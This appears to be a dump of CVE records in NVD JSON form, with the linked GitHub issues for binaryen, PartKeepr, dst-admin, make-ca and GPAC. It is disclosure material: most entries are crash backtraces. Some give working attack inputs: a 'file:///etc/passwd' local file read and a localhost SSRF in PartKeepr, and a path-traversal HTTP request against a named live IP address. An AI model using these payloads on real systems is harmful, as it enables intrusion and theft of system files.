[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:104:*:*:*:*:*:*:*", "matchCriteriaId": "C9EB2419-1D93-4BAA-83D1-1F6174CAB74E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/WebAssembly/binaryen/issues/4413
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_104 ``` **command:** ``` wasm-dis POC8 ``` [POC8.zip](https://github.com/WebAssembly/binaryen/files/7775621/POC8.zip) **Result** ``` Aborted. ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff4416040 (0x00007ffff4416040) RCX: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffb890 --> 0x0 RDI: 0x2 RBP: 0x7ffff45d5588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffffb890 --> 0x0 RIP: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffb890 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff799dc40 ("/home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h") R13: 0x31 ('1') R14: 0x7ffff799dc00 ("type.isSignature()") R15: 0xfffff700 --> 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff446017f <__GI_raise+191>: mov edi,0x2 0x7ffff4460184 <__GI_raise+196>: mov eax,0xe 0x7ffff4460189 <__GI_raise+201>: syscall => 0x7ffff446018b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff4460193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff446019c <__GI_raise+220>: jne 0x7ffff44601c4 <__GI_raise+260> 0x7ffff446019e <__GI_raise+222>: mov eax,r8d 0x7ffff44601a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffb890 --> 0x0 0008| 0x7fffffffb898 --> 0x49bba0 (<free>: push rbp) 0016| 0x7fffffffb8a0 --> 0x7ffffbad8000 0024| 0x7fffffffb8a8 --> 0x6120000001c0 --> 0x7369642d69000001 0032| 0x7fffffffb8b0 --> 0x612000000225 ("on> wasm::Builder::makeFunction(wasm::Name, wasm::HeapType, std::vector<Type> &&, wasm::Expression *): Assertion `type.isSignature()' failed.\n") 0040| 0x7fffffffb8b8 --> 0x6120000001c0 --> 0x7369642d69000001 0048| 0x7fffffffb8c0 --> 0x6120000001c0 --> 0x7369642d69000001 0056| 0x7fffffffb8c8 --> 0x6120000002b3 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff443f859 in __GI_abort () at abort.c:79 #2 0x00007ffff443f729 in __assert_fail_base (fmt=0x7ffff45d5588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff799dc00 <str> "type.isSignature()", file=0x7ffff799dc40 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h", line=0x31, function=<optimized out>) at assert.c:92 #3 0x00007ffff4450f36 in __GI___assert_fail (assertion=0x7ffff799dc00 <str> "type.isSignature()", file=0x7ffff799dc40 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h", line=0x31, function=0x7ffff799dca0 <__PRETTY_FUNCTION__._ZN4wasm7Builder12makeFunctionENS_4NameENS_8HeapTypeEOSt6vectorINS_4TypeESaIS4_EEPNS_10ExpressionE> "static std::unique_ptr<Function> wasm::Builder::makeFunction(wasm::Name, wasm::HeapType, std::vector<Type> &&, wasm::Expression *)") at assert.c:101 #4 0x00007ffff51417c4 in wasm::Builder::makeFunction (name=..., type=..., vars=..., body=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h:49 #5 0x00007ffff6ea172f in wasm::WasmBinaryBuilder::readImports (this=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:2059 #6 0x00007ffff6e9967e in wasm::WasmBinaryBuilder::read (this=0x7fffffffcce0) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:1417 #7 0x00007ffff7046785 in wasm::ModuleReader::readBinaryData (this=<optimized out>, input=..., wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:63 #8 0x00007ffff7046f76 in wasm::ModuleReader::readBinary (this=<optimized out>, filename=<incomplete type>, wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:74 #9 0x00000000004cf7ca in main (argc=<optimized out>, argv=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/tools/wasm-dis.cpp:65 #10 0x00007ffff44410b3 in __libc_start_main (main=0x4cdef0 <main(int, char const**)>, argc=0x2, argv=0x7fffffffe348, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe338) at ../csu/libc-start.c:308 #11 0x000000000042375e in _start () at /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/iostream:74 ```
A abort failure in wasm::Builder::makeFunction
https://api.github.com/repos/WebAssembly/binaryen/issues/4413/comments
2
2021-12-25T08:10:49Z
2022-01-05T01:17:37Z
https://github.com/WebAssembly/binaryen/issues/4413
1,088,566,464
4,413
2,968
CVE-2022-22701
2022-01-10T14:12:48.547
PartKeepr versions up to v1.4.0, loads attachments using a URL while creating a part and allows the use of the 'file://' URI scheme, allowing an authenticated user to read local files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/hendrix/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/partkeepr/PartKeepr/issues/1229" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/hendrix/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/partkeepr/PartKeepr/issues/1229" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:partkeepr:partkeepr:*:*:*:*:*:*:*:*", "matchCriteriaId": "D1BADC74-D7C6-49AC-AE9D-C3B8FB7FF958", "versionEndExcluding": null, "versionEndIncluding": "1.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/partkeepr/PartKeepr/issues/1229
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "partkeepr", "PartKeepr" ]
[comment]: # (Hi and thanks for an issue. In order to help you best, please fill out the following information.) # Bug description In PartKeepr before **v1.4.0**, the functionality to load attachments using a URL when creating a part, allows the use of the **file://** URI scheme, allowing local files to be read. ## Steps to reproduce 1. Go to 'Add Part'. 2. Click on 'Attachments'. 2. Click on 'Add'. 3. Fill the 'URL' field with "file:///etc/passwd". 4. Click on the uploaded file in order to see the content. ## Expected behavior The application should not allow access to local files. ## Observed behavior Local paths can be used to read files on the system. ## Screenshots and files ![path_file](https://user-images.githubusercontent.com/17485471/148068290-56dffec4-08a9-419a-b5ce-251460835cde.png) ![passwd_content](https://user-images.githubusercontent.com/17485471/148068319-47f2bd8b-4590-448b-ab5b-cd1723911b54.png) ## System Information * PartKeepr Version: v1.4.0 and v0.1.9 * Operating System: Linux * Web Server: Apache * PHP Version: 7.4 * Database and version: Mysql * Reproducible on the demo system: Yes.
The functionality add attachment to parts allows access to local files.
https://api.github.com/repos/partkeepr/PartKeepr/issues/1229/comments
3
2022-01-04T13:52:52Z
2022-01-13T14:05:45Z
https://github.com/partkeepr/PartKeepr/issues/1229
1,093,377,186
1,229
2,969
CVE-2022-22702
2022-01-10T14:12:48.993
PartKeepr versions up to v1.4.0, in the functionality to upload attachments using a URL when creating a part does not validate that requests can be made to local ports, allowing an authenticated user to carry out SSRF attacks and port enumeration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/joplin/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/partkeepr/PartKeepr/issues/1230" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/joplin/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/partkeepr/PartKeepr/issues/1230" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:partkeepr:partkeepr:*:*:*:*:*:*:*:*", "matchCriteriaId": "D1BADC74-D7C6-49AC-AE9D-C3B8FB7FF958", "versionEndExcluding": null, "versionEndIncluding": "1.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/partkeepr/PartKeepr/issues/1230
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "partkeepr", "PartKeepr" ]
[comment]: # (Hi and thanks for an issue. In order to help you best, please fill out the following information.) # Bug description In PartKeepr before **v1.4.0**, the functionality to upload attachments using a URL when creating a part, does not validate that requests can be send to local ports, allowing SSRF attacks and port enumeration. ## Steps to reproduce 1. Go to 'Add Part'. 2. Click on 'Attachments'. 2. Click on 'Add'. 3. Fill the 'URL' field with an url using a local port "http://127.0.0.1:3306". 4. Click on the uploaded file in order to download the file and see the content. ## Expected behavior The application should not allow access to local ports. ## Observed behavior Local ports can be access inside the server. ## Screenshots and files ![ssrf](https://user-images.githubusercontent.com/17485471/148074112-fc74c3d8-ab27-403b-9ccc-9fd0560f2bf3.png) ![mysql_open_port](https://user-images.githubusercontent.com/17485471/148074136-b6be7fdd-932c-48e5-811d-2dbd72526862.png) ![close_port](https://user-images.githubusercontent.com/17485471/148074196-1e787b36-65cd-4189-b5f9-5f0bf8bbb65b.png) ## System Information * PartKeepr Version: v1.4.0 and v0.1.9 * Operating System: Linux * Web Server: Apache * PHP Version: 7.4 * Database and version: Mysql * Reproducible on the demo system: Yes.
The functionality add attachment to parts allows access to local ports (SSRF).
https://api.github.com/repos/partkeepr/PartKeepr/issues/1230/comments
1
2022-01-04T14:31:21Z
2022-09-21T12:13:30Z
https://github.com/partkeepr/PartKeepr/issues/1230
1,093,412,820
1,230
2,970
CVE-2021-44586
2022-01-10T15:15:08.183
An issue was discovered in dst-admin v1.3.0. The product has an unauthorized arbitrary file download vulnerability that can expose sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/qinming99/dst-admin/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/qinming99/dst-admin/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dst-admin_project:dst-admin:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "86E1635B-3614-4F3D-8D67-B492F69BAF43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/qinming99/dst-admin/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "qinming99", "dst-admin" ]
Hi,guys! There is a **serious security problem** in your code. About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download But it must use a account and password. However, I found a new way to download any file in **unauth.** That means I can download any file **without authorization without using my account and password**. Here is the example <img width="1011" alt="1" src="https://user-images.githubusercontent.com/58387576/144038222-de93b9bc-cfac-430a-9c65-25695a97d212.png"> Target: http://106.15.186.197:8080 And the http data is: `GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1 Host: 106.15.186.197:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1` **poc: /images;/../backup/download?fileName=../../../../../../../../etc/passwd** Remember to use burpsuite not browser Have a nice day!
A security issue
https://api.github.com/repos/qinming99/dst-admin/issues/28/comments
1
2021-11-30T11:26:05Z
2021-12-13T01:37:57Z
https://github.com/qinming99/dst-admin/issues/28
1,067,119,743
28
2,971
CVE-2022-21672
2022-01-10T21:15:08.043
make-ca is a utility to deliver and manage a complete PKI configuration for workstations and servers. Starting with version 0.9 and prior to version 1.10, make-ca misinterprets Mozilla certdata.txt and treats explicitly untrusted certificates like trusted ones, causing those explicitly untrusted certificates trusted by the system. The explicitly untrusted certificates were used by some CAs already hacked. Hostile attackers may perform a MIM attack exploiting them. Everyone using the affected versions of make-ca should upgrade to make-ca-1.10, and run `make-ca -f -g` as the `root` user to regenerate the trusted store immediately. As a workaround, users may delete the untrusted certificates from /etc/pki/tls and /etc/ssl/certs manually (or by a script), but this is not recommended because the manual changes will be overwritten next time running make-ca to update the trusted anchor.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/lfs-book/make-ca/issues/19" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lfs-book/make-ca/pull/20" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lfs-book/make-ca/security/advisories/GHSA-m5qh-728v-4xrx" }, { "source": "security-advisories@github.com", "tags": [ "Mailing List", "Mitigation", "Vendor Advisory" ], "url": "https://lists.linuxfromscratch.org/sympa/arc/blfs-support/2022-01/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/lfs-book/make-ca/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lfs-book/make-ca/pull/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lfs-book/make-ca/security/advisories/GHSA-m5qh-728v-4xrx" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Mitigation", "Vendor Advisory" ], "url": "https://lists.linuxfromscratch.org/sympa/arc/blfs-support/2022-01/msg00020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfromscratch:make-ca:*:*:*:*:*:*:*:*", "matchCriteriaId": "9DF45D07-0CDF-49E7-B12B-1A17B3357573", "versionEndExcluding": "1.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "0.9", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "115" ]
115
https://github.com/lfs-book/make-ca/issues/19
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "lfs-book", "make-ca" ]
Reported by Robert Bartel via blfs-dev, and it also happens on my system: Just recently I noticed that the /etc/pki/tls/certs/ca-bundle.crt generated by make-ca 1.9 includes two explicitly distrusted certificates as indicated by their comments: ``` # Explicitly Distrust DigiNotar Root CA # Explicitly Distrusted DigiNotar PKIoverheid G2 ``` It seems to me that p11-kit and OpenSSL can explicitly distrust certificates in their CA stores for various usage purposes while the PEM bundle format (ca-bundle.crt) used mainly by GnuTLS does not support this. So my interpretation is that all applications using the bundles will trust these bad certificates. As make-ca uses p11-kit's "trust extract" utility to generate the PEM bundles, I looked in trust/extract-pem.c of p11-kit 0.24. Here it looks like it iterates over all certificates in the CA store and the trust status is only indicated by the generated comment line. But I could be wrong. I'm not wanting to create a GitHub account right now to report the issue to the p11-kit project, so I first ask here if anyone can confirm or reject this? For the time being I resorted to remove the bad certificates by using the following command line: ``` for file in /etc/pki/tls/certs/*.crt; do awk -- '/^# Explicitly Distrust/ { delcert = 1 } !delcert { print } /^-----END/ { delcert = 0 }' "${file}" >"${file}.tmp" mv -vf "${file}.tmp" "${file}" chmod -v 444 "${file}" done ``` Thank you for reading this and keep up the good work!
/etc/pki/tls and /etc/ssl/certs include distrusted certificates
https://api.github.com/repos/lfs-book/make-ca/issues/19/comments
0
2022-01-08T15:44:30Z
2023-10-03T10:06:38Z
https://github.com/lfs-book/make-ca/issues/19
1,096,962,233
19
2,972
CVE-2020-25427
2022-01-10T22:15:08.067
A Null pointer dereference vulnerability exits in MP4Box - GPAC version 0.8.0-rev177-g51a8ef874-master via the gf_isom_get_track_id function, which causes a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/8e585e623b1d666b4ef736ed609264639cb27701" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1406" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/8e585e623b1d666b4ef736ed609264639cb27701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1406" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1406
[ "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Command-: MP4Box -crypt test.xml $POC -out test.mp4 Version-: MP4Box - GPAC version 0.8.0-rev177-g51a8ef874-master Reproducer file-: [Reproducer](https://github.com/mannuJoshi/POCs/blob/master/POC) GDB-: ``` IsoMedia import id:000034,sig:11,src:000003,op:flip4,pos:8995 - track ID 1 - media type "sdsm:mp4s" [BS] Attempt to write 128 bits, when max is 32 Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── $rax : 0x0 $rbx : 0x0 $rcx : 0x0 $rdx : 0x1 $rsp : 0x00007fffffff8fc0 → 0x0000000100000000 $rbp : 0x2153 $rsi : 0x1 $rdi : 0x00005555555bff20 → 0x0000000000000000 $rip : 0x00007ffff7b0e625 → <gf_media_update_bitrate+389> mov DWORD PTR [rax+0x14], ecx $r8 : 0x2 $r9 : 0x1 $r10 : 0x0 $r11 : 0x00005555555c37c0 → 0x0000000000000001 $r12 : 0x2153 $r13 : 0x00005555555bff20 → 0x0000000000000000 $r14 : 0x1 $r15 : 0x00005555555c4460 → 0x0000000000010003 $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffff8fc0│+0x0000: 0x0000000100000000 ← $rsp 0x00007fffffff8fc8│+0x0008: 0x0000000000000000 0x00007fffffff8fd0│+0x0010: 0x0000000000002153 ("S!"?) 0x00007fffffff8fd8│+0x0018: 0x00000000000003e8 0x00007fffffff8fe0│+0x0020: 0x00007fffffff9000 → 0x0000000000000000 0x00007fffffff8fe8│+0x0028: 0x00005555555c4460 → 0x0000000000010003 0x00007fffffff8ff0│+0x0030: 0x0000000000000000 0x00007fffffff8ff8│+0x0038: 0x0000000000000000 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x7ffff7b0e618 <gf_media_update_bitrate+376> sbb BYTE PTR [r9+r9*4-0x11], r9b 0x7ffff7b0e61d <gf_media_update_bitrate+381> mov edx, 0x1 0x7ffff7b0e622 <gf_media_update_bitrate+386> mov esi, r14d → 0x7ffff7b0e625 <gf_media_update_bitrate+389> mov DWORD PTR [rax+0x14], ecx 0x7ffff7b0e628 <gf_media_update_bitrate+392> mov rax, QWORD PTR [r15+0x18] 0x7ffff7b0e62c <gf_media_update_bitrate+396> mov rcx, r15 0x7ffff7b0e62f <gf_media_update_bitrate+399> mov DWORD PTR [rax+0x10], ebx 0x7ffff7b0e632 <gf_media_update_bitrate+402> mov rax, QWORD PTR [r15+0x18] 0x7ffff7b0e636 <gf_media_update_bitrate+406> mov DWORD PTR [rax+0xc], ebp ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "MP4Box", stopped, reason: SIGSEGV ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x7ffff7b0e625 → gf_media_update_bitrate() [#1] 0x7ffff7b13cd6 → gf_import_isomedia() [#2] 0x7ffff7b211d5 → gf_media_import() [#3] 0x55555556df0a → mp4boxMain() [#4] 0x7ffff74b5b97 → __libc_start_main(main=0x5555555631e0 <main>, argc=0x6, argv=0x7fffffffdfe8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdfd8) [#5] 0x55555556321a → _start() ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 0x00007ffff7b0e625 in gf_media_update_bitrate () from /usr/local/lib/libgpac.so.8 gef➤ bt #0 0x00007ffff79d18fd in gf_isom_get_track_id () from /usr/local/lib/libgpac.so.8 #1 0x00007ffff7b45ef1 in gf_crypt_file () from /usr/local/lib/libgpac.so.8 #2 0x0000555555577575 in mp4boxMain (argc=0x6, argv=0x7fffffffdfb8) at main.c:5474 #3 0x00005555555796a3 in main (argc=0x6, argv=0x7fffffffdfb8) at main.c:5985 gef➤ i r rax 0x0 0x0 rbx 0x0 0x0 rcx 0x20 0x20 rdx 0x0 0x0 rsi 0x0 0x0 rdi 0x5555555d0650 0x5555555d0650 rbp 0x7ffffffbd660 0x7ffffffbd660 rsp 0x7ffffffbd640 0x7ffffffbd640 r8 0x0 0x0 r9 0x0 0x0 r10 0x19 0x19 